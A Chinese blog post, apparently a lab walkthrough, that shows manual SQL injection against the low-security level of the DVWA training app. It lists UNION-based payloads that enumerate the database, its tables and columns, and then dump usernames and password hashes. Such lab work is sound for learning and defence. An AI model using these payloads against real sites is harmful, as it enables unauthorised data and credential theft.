DVWA-LOW级别
SQL手工注入
Web应用程序的开发人员对用户所输入的数据或cookie等内容不进行过滤或验证(即存在注入点)就直接传输给数据库,就可能导致拼接的SQL被执行,获取对数据库的信息以及提权,发生SQL注入攻击。
low级别
选择难度low
首先在表单中输入1
输入2
查看源代码可知这一关对于表单输入ID没有进行任何过滤
注入点判断,可知受到单引号闭合影响
方便把SQL语句中后续语句全部注释掉不执行,不用考虑单引号闭合影响
语句1’ or 1=1#可以查出所有ID内容
然后判断字段(就是正常查询时可以显示用户的几条信息)
1’and 1=1 order by 1#
1’and 1=1 order by 2#
1’and 1=1 order by 3#
如果2是正确的的,3返回错误那么就有2个字段,2即为分界点
找出字段之后(找字段的作用是为了后续报错,看会有几个位置可以报错)
结合union联合查询
1’ union select 1,2#或者 -1’ union select 1,2#
二者没什么区别,第二种看起来更简洁
把查询语句中2的位置换成你要查询到内容,那么在返回结果上就在你替换掉的数字的位置上即可显示该信息。
首先是数据库名,表名,列名,之后是具体信息
数据库名
1’ union select 1,database()#
笔记:
1、在MYSQL5.0以上版本中存在自带数据库information_schema,他是一个存储所有数据库名,表明,列名的数据库,相当于可以通过查询此库获得相应信息。
2、符号“.”代表下一级
表名 table_name也可以用group_concat替换
1' union select 1,table_name from information_schema. tables where table_schema='dvwa' #
列名
1' union select 1 , column_name from information_schema.columns where table_name = 'users'#
用户名和密码
1' union select user,password from users#
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 25岁的心里话
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· 闲置电脑爆改个人服务器(超详细) #公网映射 #Vmware虚拟网络编辑器
· 一起来玩mcp_server_sqlite,让AI帮你做增删改查!!
· 零经验选手,Compose 一天开发一款小游戏!